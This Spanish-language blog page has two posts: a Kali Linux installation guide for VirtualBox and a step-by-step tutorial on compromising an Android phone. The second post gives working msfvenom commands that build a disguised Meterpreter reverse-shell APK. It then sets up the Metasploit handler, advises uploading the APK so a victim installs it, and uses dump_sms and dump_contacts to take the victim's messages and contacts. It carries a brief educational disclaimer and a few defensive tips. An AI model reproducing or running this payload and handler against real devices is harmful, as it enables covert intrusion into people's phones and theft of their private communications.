:::: MENU ::::
  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

miércoles, 15 de junio de 2016

Debido a que este blog se dedica en mayor parte a utilizar Kali Linux, es menester hacer una entrada sobre cómo instalar éste correctamente ya sea en nuestra PC con una memoria usb booteable, o en una máquina virtual.

Este Tutorial está en video!!!!. Puedes dar click aquí para ver el video de instalación. También puedes ir al Final del post para acceder al mismo.

Para descargar esta guía puedes hacer click en este enlace, después de dos acortadores de enlace accederás a Mega.

http://ouo.io/kqvnFX

Sino pues puedes leerla desde aquí.

Requisitos:
  1. Tener descargado el Kali Linux 2016, se puede descargar de aquí: https://www.kali.org/downloads/
  2. Poseer la imagen ISO del Kali Linux en una usb o en una máquina Virtual (Aquí trabajaremos con esta).
  3. Tener al menos 100 Gb de disco duro libre (No lo utilizaremos todo, solo un 30% a 50%).
  4. VM VirtualBox como Máquina Virtual, se puede descargar de aquí: https://www.virtualbox.org/wiki/Downloads
  5. Tener conexión a Internet.
  6. Tener una tarjeta de red externa, esta puede ser USB. (Sin ella, no podremos usar el puente para obtener ip diferente en las máquinas virtuales, además de que Kali Linux no podrá captar señales WiFi), en realidad no es necesario para la Instalación, pero si para escanear redes WiFi cuando este ya esté instalado.
Proceso:

Primero vamos a crear una Nueva Máquina Virtual, vamos a "Nueva".



Ahora vamos a darle las propiedades de la máquina virtual, en este caso le puse:

Nombre: Kali Linux 2016 (Prueba)
RAM: 2Gb
SO: Linux - Otro Linux de 64 bits.
Disco: Reservado Dinámicamente.
Tamaño de Disco: 40GB




Ahora nos vamos a ir a Configuraciones y haremos lo siguiente:

En Sistema: Pondré 2 Procesadores (Opcional)
En Pantalla: Le dí 30mb de memoria de vídeo (Opcional)



En disco duro le damos click donde dice "Vacio", y en la parte derecha buscamos nuestra ISO Kali Linux.


Ahora en Red le damos a Conectar a adaptador puente.


Ya habremos configurado el Kali Linux para correr en nuestra máquina Virtual, ahora procederemos a la Instalación del mismo.

Abrimos el Kali Linux 2016 (Prueba) que creamos dando doble click sobre él.
En la pantalla del SO que nos abre nos vamos a:  Graphical Install

Escogemos el idioma de preferencia y la región.




Si nos da este error, es por la placa de red, le damos en Continuar.


Le damos en configurar mas tarde.


En la Siguiente pantalla le damos en Guiado Utilizar todo el disco, y luego escogemos el disco en que se llevará a cabo a instalación.
Sigan las imágenes.









Nos preguntará si queremos guardar los cambios hechos en el disco, le daremos obviamente que sí.



Le decimos que no queremos una réplica de red.



Le dan que si para Instalar el cargador de arranque GRUB.

Es en este punto en el que tienen que tener mucho ojo, ya que debido a la mala configuración a algunas personas les puede quedar el Kali Linux en Pantalla Negra al Iniciar (Pantalla Negra con un Guion Blanco de forma Intermitente.

Por tanto vamos a darle que si para instalar el GRUB.



Ahora esto es muy importante, vamos a introducirlo MANUALMENTE, esto es crucial para que no nos quede en pantalla negra al iniciar.

Por tanto le damos a la primera opción como muestra la Imagen.


Y ahora en la parte para escribir deberán ubicar esto.

/dev/sda

El Kali Linux como se ve en la imagen nos muestra algunos ejemplos, en nuestro caso estaremos utilizando el del primer ejemplo que nos dieron, por tanto escribimos lo que anteriormente les puse.
De igual manera se apoyan en la imagen.



LISTO!!!!!

Ya habremos instalado correctamente Kali Linux en VirtualBox, ahora nos aparecerá esta pantalla al finalizar.



Le damos en continuar, y se nos iniciará el Kali Linux normalmente.
Aquí le damos en la primera opción.
*Kali GNU/Linux.



Luego para Iniciar sesion se tienen que poner los datos:

Nombre de Usuario: root (Siempre será root)
Contraseña: La que le definimos en la instalacion.





COMPLETADO!!!

Ahora ya podremos utilizar Kali Linux normalmente sin necesidad de Instalarlo en nuestro disco duro, desde ahí se pueden realizar todos los procedimientos indicados en este blog.
Aunque para localizar redes WiFi deberán conectarle una tarjeta de red externa que reconozco VirtualBox.



Pueden comprar una Tarjeta de Red usb WiFi, son baratas y son buenas.




- Cuculmeca

martes, 14 de junio de 2016

Antes, para ver esta guía sin conexión puedes descargarla desde aquí para leerla en cualquier dispositivo compatible con Microsoft Word sin conexión a Internet: http://ouo.io/EPokCW

Este tutorial se encuentra en Video!. Puedes dar click aquí para verlo.

Sino pues continua leyendo.

Sin duda el Smartphone lo tenemos en el día a día, de hecho se podría decir que hasta nos hemos hecho dependientes del mismo.
Esta es una de las cosas que los Hackers de Sombrero Negro (Llamados Crackers) lo saben y lo entienden muy bien, por eso es necesario saber qué hacer para cuidarnos de ataques de los mismos, la mejor forma de aprender a defenderse es saber cómo actúan, como piensan sus fechorías.
En este Blog iremos aprendiendo solo un poco de lo que los Crackers pueden realizar a desprevenidos consumidores e iremos aprendiendo cómo evitar caer en sus trampas.
A continuación veremos que con Kali Linux una distribución basada en Debian GNU/Linux, se puede acceder a los Smartphones de las personas, en este caso a un Smartphone Android. 
1. Encender Kali Linux en una máquina Virtual o en tu PC.
Podemos utilizar una máquina virtual como VirtualBox o bien bootear una memoria usb y ubicarle la imagen ISO de Kali Linux.
2. Abrir una Consola de Kali Linux.
Para esto podemos irnos al icono negro de consola en la parte izquierda como muestra la Imagen.
3. Elegimos método y Payload.
Aquí estaremos eligiendo cuál es el Payload que usaremos para realizar el ataque con Metasploit, en este caso utilizaremos:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000

msfvenom: Indicará que utilizaremos Metasploit para el ataque.
-p: Indica a msfvenom que utilizaremos un payload.
android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una conexión reversa, esto quiere decir que es el dispositivo vícima el que abrirá con nosotros una sesión en Meterpreter.
lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que nos da el Router para identificarnos dentro del host.
lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos normalmente usados como 80,4444, ya que puede estar siendo utilizado.
Para saber cual es la ip que ubicaremos en lhost podemos abrir otra terminal y ubicar el comando:

ifconfig



4. Elegimos la ruta del "Virus".
En este caso lo ubicaremos en el Escritorio con:

R > /root/Desktop/Nombredelarchivo.apk

Muchas veces dependiendo del idioma del Kali Linux, la ruta puede cambiar, por ejemplo, en lugar de ubicar "Desktop" se debe ubicar "Escritorio". De esta forma tendremos completo el comando que debemos ejecutar:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=7000 R > /root/Desktop/AplicacionVirus.apk

5. Ejecutar.
Presionar ENTER para crear el archivo APK, este quedará obviamente en la carpeta que hayamos tecleado. Como muestra a continuación el archivo está en Escritorio.
6. Subimos el archivo.
Podemos subir el archivo a la nube, o a alguna página de descargas, en este caso lo subí a Mega, de aquí se trata de hacer que la víctima se descargue el apk que hemos creado y la ejecute, pero eso será luego.
7. Abrir la consola Metasploit.
Para eso utilizaremos el comando:

msfconsole

De esta manera tendremos la consola abierta.
8. Usar el Handler y preparar Exploit.
Abrimos el Handler de escucha, esto esperará que la victima se conecte a nosotros, para eso usamos el comando:

use exploit/multi/handler


9. Set los parámetros que va a escuchar el Handler.
En este caso vamos a ubicarle los parámetros que el Handler en Metasploit estará esperando (Escuchando), por tanto daremos los parámetros que ubicamos en el archivo virus que creamos anteriormente.
Los comandos son los siguientes:

set PAYLOAD android/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 7000

Y luego comprobamos que todo esté bien tecleado con el comando:

show options

Se guian con la imagen que sigue.
10. Iniciar el Exploit.
Para eso usamos el comando:

exploit

De esta manera estaremos en escucha y espera a que nuestra víctima abra la aplicación maliciosa.
11. Obtener contactos y mensajes del smartphone.
Cuando el Smartphone abra la aplicación (Obviamente tú y el Smartphone tienen que tener conexión a Internet y estar dentro de la misma red LAN), se mostrará que se a abierto una sesión en Meterpreter.
Ahora con los comandos siguientes podremos obtener un archivo text de los mensajes y de los contactos del smartphone.

dump_sms
dump_contacts


Entonces al realizar los comando obtendremos archivos text que se guardaran en la carpeta Home del sistema (A esta se accede directamente del escritorio dando click en el icono de carpeta al lado derecho). Estos archivos contendrán los mensajes de texto enviados y recibidos del smartphone víctima así como sus contactos personales.

12. Salir de consolas.

Ahora puedes salir de las consolas, bien cerrando sesión con exit o cerrando la ventana del Metasploit, o explorar otras opciones.

Terminado!


Ahora ya sabes como los que usan Kali Linux pueden realizar este tipo de ataques y obtener tu información, por lo tanto la pregunta:
¿Cómo nos podemos proteger de estos ataques?
* No descargar aplicaciones dudosas.
* No instalar aplicaciones de sitios de dudosa reputación.
* Leer atentamente los permisos que se le dan a las aplicaciones.
* Tener un buen suit de protección de Android (Firewalls, Antivirus etc...)

IMPORTANTE!

* Todo lo anteriormente hecho se a realizado bajo un régimen cuidadosamente diseñado, se a atacado a mi smartphone y nadie a sido víctima del ataque, además de haberse realizado dentro de la Red LAN.
* Todos los conocimientos, técnicas, métodos y herramientas brindadas en este post son con fines educativos e informativos, por lo tanto no me hago responsable de la mala utilización de estas técnicas, cometer un delito es muy grave, por favor evítalo.
* Las imágenes han sido de elaboración propia.

- Cuculmeca
A call-to-action text Contact us